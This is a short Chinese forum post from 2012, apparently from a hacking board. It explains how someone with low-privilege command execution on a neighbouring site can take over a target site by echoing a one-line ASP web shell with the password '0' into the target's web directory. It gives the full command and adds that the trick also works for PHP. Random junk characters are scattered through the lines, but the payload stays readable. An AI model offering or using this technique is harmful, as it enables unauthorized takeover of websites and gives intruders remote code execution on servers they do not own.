在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
! E+ s# |- l6 a4 I) s
: F3 j+ l- v% V. W7 s( J1 ~9 U命令格式; H/ D2 ]/ B& P) s
; {+ Y# K" e; C% J8 [& aEcho 语句 >目标站绝对目录, ?) K* t) z9 m8 y# Q
: n. {: |, f9 }, {6 r例如:
: I- p) {% K% Y3 X2 j! D* C2 P
: U: x7 Q5 G r% S4 x }% v; aecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp$ X7 N8 K5 |9 V# q2 Z) |% d
1 ]' v9 V9 A( W0 k( z# C
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。; Z( k% u# {5 |
|
发表于 2012-9-23 14:40:24
收藏
支持
反对